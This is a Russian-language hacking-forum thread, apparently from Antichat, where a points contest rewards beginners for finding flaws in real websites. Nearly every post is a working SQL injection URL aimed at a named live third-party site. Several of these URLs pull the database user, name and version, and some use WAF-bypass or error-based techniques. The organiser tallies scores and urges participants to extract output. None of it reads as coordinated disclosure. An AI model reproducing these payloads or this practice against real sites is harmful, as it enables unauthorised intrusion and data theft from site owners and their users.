Конкурс уязвимостей для новичков

Правила:
Ваша задача найти уязвимости в веб-приложениях.
Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).
Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.
За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).
В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:

Уязвимости:

• SQL Injection (2 балла)
• Stored XSS (2 балла)
• Reflected XSS (1 балл)
• Local File Inclusion (3 балла)
• Remote File Inclusion (4 балла)
• Remote Code Execution (5 баллов)
• XXE (5 баллов)
• Arbitary File Read (3 балла)

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

Типы уязвимостей:

• Оранжевые (с приложенным исходным кодом уязвимости)
• Серые (эксплоит без кода)

 

Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7

 

тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

P. S. активнее, ребят

 

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )

 

исходники с уязвимостью прибавляют баллы, но можно и без них

 

Да, тулзой кручу.


Сайт: theatreinchicago.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

Сайт: tsgconsumer.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

Сайт: alicekwartler.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

Сайт: athenscine.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

Сайт: cstv.collegesports.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

Сайт: ctnrecruiting.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Сайт: diarionecochea.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

Сайт: eu.bosscom.com
Уязвимость: SQL Injection

Эксплоит:

Code:

http://eu.bosscom.com/product.asp?id=[t]

Какой именно запрос на вывод нужен?

 

если blind, то хотя бы substring версии

 

а разница?

 

я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.

 

Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.

Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,999,8,9,10,11,12,13,14,15,16,17,18

Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75

Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2,999

Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4,999,6--

Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20,1,2%20and%20%220%22=%220&lang=english

Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1

Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999

 

Сайт: www.justintime.in
Уязвимость: SQLi
Эксплоит:

Code:

http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+

Сайт: www.hergolfgame.com
Уязвимость: SQLi
Эксплоит:

Code:

http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+

Сайт: www.secretslk.com
Уязвимость: SQLi
Эксплоит:

Code:

http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r

Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:

Code:

http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+

Сайт: www.localfirstaz.com
Уязвимость: SQLi
Эксплоит:

Code:

http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+

 

добавил в таблицу.

на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод

 

Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:

Code:

http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-

Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:

Code:

http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-

Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:

Code:

http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-

Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:

Code:

http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+

Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:

Code:

http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+

 

Сайт: www.cobranet.org/about.php?id=1
Уязвимость: SQLi
Эксплоит:
http://www.cobranet.org/about.php?id=9999999 union select 1,2,3,version(),5,6 --

Сайт: http://www.raahauges.com/view-news.php?id=8
Уязвимость: SQLi
Эксплоит: http://www.raahauges.com/view-news.php?id=null union select 1,2,@@Version,4,5 --

 

Сайт: http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:

Code:

http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14

 

предыдущие поправьте на нормальный вывод.

все, 20 баллов набрано, поздравляю!

 

Cайт:http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:

Code:

http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--

Сайт:http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:

Code:

http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0

Сайт:http://gobpo.com/
Уязвимость:SQLi
Эксплойт:

Code:

http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--

Cайт:http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:

Code:

http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3

Cайт:http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:

Code:

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999

Сайт:http://www.focus-lighting.com/
Уязвимость:
Эксплойт:

Code:

http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9

 

очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t